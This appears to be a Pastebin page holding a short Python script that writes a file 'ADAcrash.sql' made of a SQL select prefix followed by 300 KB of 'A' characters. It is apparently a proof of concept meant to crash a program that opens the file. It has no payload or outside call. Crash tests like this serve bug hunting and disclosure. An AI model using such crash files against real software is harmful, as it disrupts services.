Advertisement
Guest User

r0i (@rmallof)

a guest
Nov 1st, 2010
1,547
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.14 KB | None | 0 0
  1. #!/usr/bin/python
  2.  
  3. sql="select * from clients where "
  4. buf="A"*(1024*300)
  5. crash=sql+buf
  6.  
  7. f=open("ADAcrash.sql",'w')
  8. f.write(crash)
  9. f.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement